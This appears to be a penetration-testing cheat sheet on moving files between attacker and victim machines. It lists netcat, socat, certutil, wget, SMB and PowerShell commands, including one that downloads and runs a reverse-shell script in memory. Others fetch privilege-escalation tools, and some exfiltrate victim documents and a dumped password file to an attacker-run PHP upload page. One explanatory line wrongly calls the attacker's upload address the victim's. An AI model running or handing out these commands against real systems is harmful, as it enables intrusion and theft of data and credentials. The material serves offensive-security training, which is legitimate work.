File Transfer

nc

Receving machine:

nc -nlvp 4444 > incoming.exe

Sending machine:

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

socat

Sending:

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Receving:

nc <remote server's ip address> 80 kali@kali:~$ socat - TCP4:<remote server's ip address>:80
sudo nc -lvp localhost 443 kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT

PowerShell

Set-ExecutionPolicy Unrestricted

Download file and save specifically.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Downloads and runs without saving to disk:

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')

Basic invocation:

invoke-webrequest -uri http://10.10.14.5/JuicyPotato.exe -outfile jp.exe

certutil

certutil -urlcache -f http://10.10.16.2:8899/winpeas.bat winpeas.bat

wget

wget http://10.50.121.50:8000/LinPEAS.sh -o lp.sh

scp

From Attacker machine.

scp ariah@192.168.130.99:C:/ftp/Infrastructure.pdf .

Password will be required, sshd has to be running on victim (source for file). If necessary, start it:

systemctl start ssh.socket

Windows Exfiltration

If everything is disabled, usually HTTP outbound is still allowed.

Create the upload.php file and save it in /var/www/html on kali:

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

This processes an incoming file request and saves the transferred data to /var/www/uploads.

Next create the uploads folder, grant www-data permissions.

Then invoke the retrieval from the victim.

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Where the IP is the victim machine and important.docx should now be in the kali uploads directory.

SMB

My personal fave, great for windows machines.

smbserver.py <SHARENAME> . --smb2support

Copy to remote machine

copy \\192.168.119.153\\sharez\\nc.exe "C:\\Documents and Settings\\no\\nc.exe"

Copy to kali

copy "C:\Documents and Settings\no\127.0.0.1.pwdump" \\192.168.119.153\\sharez\\127.0.0.1.pwdump
PreviousSQLNextExternal

Last updated